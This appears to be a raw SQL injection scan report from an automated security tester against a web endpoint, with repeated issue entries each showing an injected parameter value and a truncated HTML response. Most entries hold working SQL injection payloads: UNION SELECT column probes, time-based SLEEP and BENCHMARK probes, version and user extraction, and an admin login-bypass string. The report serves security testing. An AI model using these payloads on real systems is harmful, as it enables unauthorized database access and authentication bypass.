href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1822\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1823\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1824\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1825\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1826Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1827\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1828\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1829\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1830\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1831\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1832\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1833\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1834\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1835\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> 